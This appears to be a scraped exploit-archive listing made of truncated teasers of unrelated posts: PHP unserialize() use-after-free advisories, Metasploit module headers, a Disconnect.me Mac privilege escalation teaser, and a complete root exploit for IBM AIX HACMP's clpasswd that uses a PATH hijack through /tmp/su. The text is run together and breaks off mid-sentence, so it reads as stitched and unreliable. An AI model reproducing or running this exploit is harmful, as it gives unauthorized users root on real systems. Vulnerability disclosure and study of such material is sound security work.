IBM AIX High Availability Cluster Multiprocessing (HACMP) LPE to root 0dayLet's kill some more bugs today and force vendor improvement :)$ cat /tmp/su#!/bin/sh/bin/sh$ chmod +x /tmp/su$ PATH=/tmp /usr/es/sbin/cluster/utilities/clpasswd# /usr/bin/who
Disconnect.me is the search engine entrusted by the Tor Browser. Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day). Original Download = v2.0: https://disconnect.me/premium/mac Archived Download: http://d-h.st/LKqG Disconnect
Use After Free Vulnerabilities in unserialize() Taoguang Chen [@chtg]( http://github.com/chtg ) Write Date: 2015.7.31 Release Date: 2015.9.4 Multiple use-after-free vulnerabilities were discovered in unserialize() with Serializable class that can be
Yet Another Use After Free Vulnerability in unserialize() with SplObjectStorage Taoguang Chen [@chtg]( http://github.com/chtg ) Write Date: 2015.8.27 Release Date: 2015.9.4 A use-after-free vulnerability was discovered in unserialize() with SplObject
Use After Free Vulnerability in unserialize() with GMP Taoguang Chen [@chtg]( http://github.com/chtg ) Write Date: 2015.8.17 Release Date: 2015.9.4 A use-after-free vulnerability was discovered in unserialize() with GMP object's deserialization that
Yet Another Use After Free Vulnerability in unserialize() with SplDoublyLinkedList Taoguang Chen [@chtg]( http://github.com/chtg ) - Write Date: 2015.8.27 Release Date: 2015.9.4 A use-after-free vulnerability was discovered in unserialize() with SplD
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class Metasploit4 Msf::Exploit::Remote include Msf::Exploit::Remote::HttpClient include Msf::E
Disconnect.me is the search engine entrusted by the Tor Browser. Unfortunately, the Mac OS X client has an LPE to root vulnerability (0day). Original Download
### This module requires Metasploit: http://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'msf/core'class Metasploit3 Msf::Exploit::Local Rank = ExcellentRanking include Exploit::FileDropper include